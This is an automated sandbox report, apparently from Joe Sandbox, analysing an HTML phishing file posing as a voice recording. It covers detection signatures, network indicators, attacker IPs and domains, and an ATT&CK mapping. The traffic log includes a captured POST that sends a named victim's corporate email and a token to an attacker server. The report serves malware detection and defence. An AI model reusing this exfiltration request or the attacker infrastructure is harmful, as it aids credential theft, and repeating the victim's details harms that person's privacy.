Edit tour

Windows Analysis Report
Tanveer Sethi_Voice-REC-481680954386772.html

Overview

General Information

Sample name:Tanveer Sethi_Voice-REC-481680954386772.html
Analysis ID:1625443
MD5:d44cce885742160c3ce552280eed56d2
SHA1:66609d4d0e85566900a5265bf7c76bbc656c1ff1
SHA256:0f7f173e6f70c4958b783074205e8698290bfdd7f3c2811f3df208ed099b92ee
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Confidence:100%

Signatures

Yara detected HtmlPhish76
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML Script injector detected
HTML document with suspicious name
HTML document with suspicious title
Suspicious Javascript code found in HTML file
Detected non-DNS traffic on DNS port
Stores files to the Windows start menu directory

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Downloads\eYjhNNmIwC\Tanveer Sethi_Voice-REC-481680954386772.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2024,i,8594538992360204343,16991340806916787047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_HtmlPhish_76Yara detected HtmlPhish_76Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: 1.1.pages.csv, type: HTML
    Source: 0.0.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script decodes and executes a large block of encoded data, which is a strong indicator of malicious intent. Additionally, the script appears to be sending data to an unknown domain, which raises concerns about potential data exfiltration. Overall, the combination of these high-risk factors suggests that this script is likely malicious and should be treated with caution.
    Source: Tanveer Sethi_Voice-REC-481680954386772.htmlHTTP Parser: Low number of body elements: 2
    Source: file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer%20Sethi_Voice-REC-481680954386772.htmlHTTP Parser: New script tag found
    Source: file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer%20Sethi_Voice-REC-481680954386772.htmlHTTP Parser: New script, src: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js
    Source: file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer%20Sethi_Voice-REC-481680954386772.htmlTab title: Tanveer Sethi_Voice-REC-481680954386772.html
    Source: Tanveer Sethi_Voice-REC-481680954386772.htmlHTTP Parser: document.write
    Source: Tanveer Sethi_Voice-REC-481680954386772.htmlHTTP Parser: No favicon
    Source: global trafficTCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:61622 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50996 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:61622 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50996 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:61622 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50996 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:61622 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50996 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:61622 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50996 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:61622 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50996 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:61622 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50996 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:61622 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50996 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:61622 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:52003 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:50996 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:61622 -> 162.159.36.2:53
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.110
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Feb 2025 07:56:06 GMTServer: Apache/2.4.52 (Ubuntu)Access-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Headers: Content-TypeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4847Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 5a 8f 73 db b6 92 fe 57 58 a7 7d 23 35 26 4c 10 20 09 ca 71 5e 7f a5 93 de 34 af 6f 2e 69 7a bd 28 bd a3 48 48 62 44 91 32 49 49 76 5c dd df 7e df 82 94 25 ca 96 9d 4c df cd 4d 26 14 08 ec 2e f6 c7 b7 8b 85 e4 9b 93 aa 8e ea 65 75 32 38 a9 96 71 ac ab ea e4 f4 64 8e 8f 68 a2 31 f7 f2 cd ab 9f ad b8 c8 6b 9d d7 56 a2 b3 74 a5 4b 9d 58 2d e9 78 99 65 d7 0c 0c d3 7a 9e 81 fa d9 17 3f fc f2 fd 9b df ff f9 c2 a2 89 e7 cf e8 69 65 51 3e b9 18 9e e8 7c 78 82 19 1d 25 cf 9f cd 75 1d 59 f1 34 2a 2b 5d 63 e9 d7 37 3f da 8a 56 b3 34 9f 59 a5 ce 30 57 4d 8b b2 8e 97 b5 95 62 f7 e1 89 35 2d f5 18 d3 49 54 47 83 74 0e e5 86 67 57 36 ad 9d 9f 62 b5 be 5e 68 ac 76 16 48 a0 d9 68 5a d7 0b 5b 5f 2e d3 15 48 fe c3 fe f5 5b fb fb 62 be 88 ea 74 94 69 f0 b6 d6 61 ed a7 17 17 3a 81 80 2d 63 1e cd 49 ea 2a d5 eb 05 b4 e9 d0 ae d3 a4 9e 5e 24 7a 95 c6 da 36 2f a7 69 9e d6 69 94 d9 55 1c 65 fa 82 9f 2e 2b 5d 9a 97 08 1b 5d 38 24 b6 aa af 33 fd fc 49 56 44 49 9a 4f 5e c7 a5 d6 f9 cd a2 a8 c0 58 e4 83 71 7a a5 93 f3 ba 58 0c 9c f3 51 51 d7 c5 1c 83 4c 8f 6b 7c 94 e9 64 4a 9f a3 28 9e 4d ca 62 99 27 76 5c 64 45 39 78 32 1e 8f 37 5b 89 3f 17 93 e2 3e 79 50 22 ee 79 ce 6a 6a d9 56 e8 2c ae fa 8d d8 ed f4 fa 76 da 58 32 e0 0a 2f e7 53 6d f6 34 2f 9b 27 af 5e df 27 bc 55 53 f8 a0 bf 23 52 7a 10 b9 61 49 54 ce ac 03 9b ef 9a 21 84 68 48 ff a1 d7 8f 53 f3 31 fd db 0c ca a2 a8 6f 6c bb 6a 55 b6 6d 9d af 7e 1b 70 71 fb f2 72 10 70 33 86 62 58 e0 ca bc 54 97 bf 35 9a ae a2 b2 d7 ac f5 ad e1 99 25 fa 66 f1 e5 40 04 5b a6 97 2f 07 ae 73 fb b2 cf 05 ba be f5 b5 25 ac a7 d6 ad 98 97 2f fb fd 86 f4 f7 83 0d 40 fb d4 72 8d 93 9b f5 17 57 f5 5d 12 db 52 7b 24 bf 20 db 8e 90 85 6e 43 36 ce a2 c5 eb 41 e8 1b 0d e9 a5 55 d1 61 9e 07 e5 1a 26 f2 43 ff 96 9a e0 d9 d1 ce b0 19 fb 77 ef bf 11 10 0c 4f b2 2c 07 5e b5 79 42 d8 8f d2 5c 97 37 0d 48 5a 27 f4 b7 38 b9 7d 8f 72 e4 a1 c1 c8 08 21 8b 75 2b 15 72 fa 56 9a 8f 29 4d f4 e6 9b 99 be 1e 97 48 b0 ca 6a a8 6e 9c af 6e ea 32 ca ab 71 51 ce 07 66 94 45 b5 fe bd e7 f4 37 dc 65 de f1 55 f7 f8 6a 40 00 14 0f 72 7b 0f ec 1b f8 8c 1f 5f 55 fe 43 bb 72 e7 01 c1 94 b0 48 a6 6d 86 05 21 c2 d7 a6 9e 81 6e 81 c0 8f b3 62 3d 98 a6 49 a2 f3 f3 79 54 4e d2 dc a6 54 b6 3d 22 6e 27 4c ca b9 1e e5 e7 6d 78 5e 4f a3 a4 58 ef 12 15 f5 14 d1 58 69 53 08 b8 c1 f2 2d db f9 7e 28 29 75 0e a2 69 80 83 24 2f 13 94 b2 12 29 b9 ac 06 8e e5 58 b0 90 fe 63 e5 ca ae cc 7e 83 72 32 8a 7a ce 29 fd 63 ae d7 07 91 04 11 ed b1 c3 43 43 6a 8f a3 e4 51 50 ec 91 12 32 8a 45 14 a7 f5 f5 c0 d9 b8 9c b9 fb ef 32 d8 bd f1 4d e0 ec bf a9 Data Ascii: ZsWX}#5&L
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Feb 2025 07:57:22 GMTServer: Apache/2.4.52 (Ubuntu)Access-Control-Allow-Origin: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Headers: Content-TypeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4847Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 5a 8f 73 db b6 92 fe 57 58 a7 7d 23 35 26 4c 10 20 09 ca 71 5e 7f a5 93 de 34 af 6f 2e 69 7a bd 28 bd a3 48 48 62 44 91 32 49 49 76 5c dd df 7e df 82 94 25 ca 96 9d 4c df cd 4d 26 14 08 ec 2e f6 c7 b7 8b 85 e4 9b 93 aa 8e ea 65 75 32 38 a9 96 71 ac ab ea e4 f4 64 8e 8f 68 a2 31 f7 f2 cd ab 9f ad b8 c8 6b 9d d7 56 a2 b3 74 a5 4b 9d 58 2d e9 78 99 65 d7 0c 0c d3 7a 9e 81 fa d9 17 3f fc f2 fd 9b df ff f9 c2 a2 89 e7 cf e8 69 65 51 3e b9 18 9e e8 7c 78 82 19 1d 25 cf 9f cd 75 1d 59 f1 34 2a 2b 5d 63 e9 d7 37 3f da 8a 56 b3 34 9f 59 a5 ce 30 57 4d 8b b2 8e 97 b5 95 62 f7 e1 89 35 2d f5 18 d3 49 54 47 83 74 0e e5 86 67 57 36 ad 9d 9f 62 b5 be 5e 68 ac 76 16 48 a0 d9 68 5a d7 0b 5b 5f 2e d3 15 48 fe c3 fe f5 5b fb fb 62 be 88 ea 74 94 69 f0 b6 d6 61 ed a7 17 17 3a 81 80 2d 63 1e cd 49 ea 2a d5 eb 05 b4 e9 d0 ae d3 a4 9e 5e 24 7a 95 c6 da 36 2f a7 69 9e d6 69 94 d9 55 1c 65 fa 82 9f 2e 2b 5d 9a 97 08 1b 5d 38 24 b6 aa af 33 fd fc 49 56 44 49 9a 4f 5e c7 a5 d6 f9 cd a2 a8 c0 58 e4 83 71 7a a5 93 f3 ba 58 0c 9c f3 51 51 d7 c5 1c 83 4c 8f 6b 7c 94 e9 64 4a 9f a3 28 9e 4d ca 62 99 27 76 5c 64 45 39 78 32 1e 8f 37 5b 89 3f 17 93 e2 3e 79 50 22 ee 79 ce 6a 6a d9 56 e8 2c ae fa 8d d8 ed f4 fa 76 da 58 32 e0 0a 2f e7 53 6d f6 34 2f 9b 27 af 5e df 27 bc 55 53 f8 a0 bf 23 52 7a 10 b9 61 49 54 ce ac 03 9b ef 9a 21 84 68 48 ff a1 d7 8f 53 f3 31 fd db 0c ca a2 a8 6f 6c bb 6a 55 b6 6d 9d af 7e 1b 70 71 fb f2 72 10 70 33 86 62 58 e0 ca bc 54 97 bf 35 9a ae a2 b2 d7 ac f5 ad e1 99 25 fa 66 f1 e5 40 04 5b a6 97 2f 07 ae 73 fb b2 cf 05 ba be f5 b5 25 ac a7 d6 ad 98 97 2f fb fd 86 f4 f7 83 0d 40 fb d4 72 8d 93 9b f5 17 57 f5 5d 12 db 52 7b 24 bf 20 db 8e 90 85 6e 43 36 ce a2 c5 eb 41 e8 1b 0d e9 a5 55 d1 61 9e 07 e5 1a 26 f2 43 ff 96 9a e0 d9 d1 ce b0 19 fb 77 ef bf 11 10 0c 4f b2 2c 07 5e b5 79 42 d8 8f d2 5c 97 37 0d 48 5a 27 f4 b7 38 b9 7d 8f 72 e4 a1 c1 c8 08 21 8b 75 2b 15 72 fa 56 9a 8f 29 4d f4 e6 9b 99 be 1e 97 48 b0 ca 6a a8 6e 9c af 6e ea 32 ca ab 71 51 ce 07 66 94 45 b5 fe bd e7 f4 37 dc 65 de f1 55 f7 f8 6a 40 00 14 0f 72 7b 0f ec 1b f8 8c 1f 5f 55 fe 43 bb 72 e7 01 c1 94 b0 48 a6 6d 86 05 21 c2 d7 a6 9e 81 6e 81 c0 8f b3 62 3d 98 a6 49 a2 f3 f3 79 54 4e d2 dc a6 54 b6 3d 22 6e 27 4c ca b9 1e e5 e7 6d 78 5e 4f a3 a4 58 ef 12 15 f5 14 d1 58 69 53 08 b8 c1 f2 2d db f9 7e 28 29 75 0e a2 69 80 83 24 2f 13 94 b2 12 29 b9 ac 06 8e e5 58 b0 90 fe 63 e5 ca ae cc 7e 83 72 32 8a 7a ce 29 fd 63 ae d7 07 91 04 11 ed b1 c3 43 43 6a 8f a3 e4 51 50 ec 91 12 32 8a 45 14 a7 f5 f5 c0 d9 b8 9c b9 fb ef 32 d8 bd f1 4d e0 ec bf a9 Data Ascii: ZsWX}#5&L
    Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 176.65.142.110Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 176.65.142.110Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: 5ruan6zklymxxoj1o8ciaecoiosprkgzbc.org
    Source: global trafficDNS traffic detected: DNS query: nogasikolen48548838384assqertyuinten.org
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 176.65.142.110Connection: keep-aliveContent-Length: 86User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: nullAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Data Raw: 7b 22 70 61 72 61 6d 65 74 65 72 22 3a 22 74 61 6e 76 65 65 72 2e 73 65 74 68 69 40 6b 6f 74 61 6b 2e 63 6f 6d 22 2c 22 74 6f 6b 65 6e 22 3a 22 39 66 61 38 61 35 32 64 2d 35 30 31 30 2d 34 64 38 66 2d 61 36 31 33 2d 37 63 30 33 38 64 62 66 63 62 37 62 22 7d Data Ascii: {"parameter":"tanveer.sethi@kotak.com","token":"9fa8a52d-5010-4d8f-a613-7c038dbfcb7b"}
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51177
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51013
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
    Source: unknownNetwork traffic detected: HTTP traffic on port 51025 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51025
    Source: unknownNetwork traffic detected: HTTP traffic on port 51173 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51177 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51178 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51052
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51173
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51031
    Source: unknownNetwork traffic detected: HTTP traffic on port 51052 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51031 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51013 -> 443

    System Summary

    barindex
    Source: Name includes: Tanveer Sethi_Voice-REC-481680954386772.htmlInitial sample: voice-rec
    Source: classification engineClassification label: mal72.phis.winHTML@13/8@9/92
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Downloads\eYjhNNmIwC\Tanveer Sethi_Voice-REC-481680954386772.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2024,i,8594538992360204343,16991340806916787047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2024,i,8594538992360204343,16991340806916787047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
    Ingress Tool Transfer
    Traffic DuplicationData Destruction

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Tanveer Sethi_Voice-REC-481680954386772.html2%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer%20Sethi_Voice-REC-481680954386772.html0%Avira URL Cloudsafe
    http://176.65.142.110/0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    nogasikolen48548838384assqertyuinten.org
    185.93.89.212
    truefalse
      unknown
      cdnjs.cloudflare.com
      104.17.25.14
      truefalse
        high
        5ruan6zklymxxoj1o8ciaecoiosprkgzbc.org
        176.65.142.116
        truefalse
          unknown
          www.google.com
          142.250.181.228
          truefalse
            high
            171.39.242.20.in-addr.arpa
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              http://176.65.142.110/false
              • Avira URL Cloud: safe
              unknown
              https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.jsfalse
                high
                file:///C:/Users/user/Downloads/eYjhNNmIwC/Tanveer%20Sethi_Voice-REC-481680954386772.htmltrue
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                142.250.186.46
                unknownUnited States
                15169GOOGLEUSfalse
                142.250.186.78
                unknownUnited States
                15169GOOGLEUSfalse
                185.93.89.212
                nogasikolen48548838384assqertyuinten.orgUnited Kingdom
                200861TS-EMEA-ASNGBfalse
                176.65.142.116
                5ruan6zklymxxoj1o8ciaecoiosprkgzbc.orgGermany
                8649WEBTRAFFICDEfalse
                176.65.142.110
                unknownGermany
                8649WEBTRAFFICDEfalse
                142.250.185.227
                unknownUnited States
                15169GOOGLEUSfalse
                142.251.173.84
                unknownUnited States
                15169GOOGLEUSfalse
                142.251.40.142
                unknownUnited States
                15169GOOGLEUSfalse
                239.255.255.250
                unknownReserved
                unknownunknownfalse
                142.250.181.228
                www.google.comUnited States
                15169GOOGLEUSfalse
                142.250.186.131
                unknownUnited States
                15169GOOGLEUSfalse
                104.17.25.14
                cdnjs.cloudflare.comUnited States
                13335CLOUDFLARENETUSfalse
                IP
                192.168.2.16
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1625443
                Start date and time:2025-02-27 08:54:58 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsinteractivecookbook.jbs
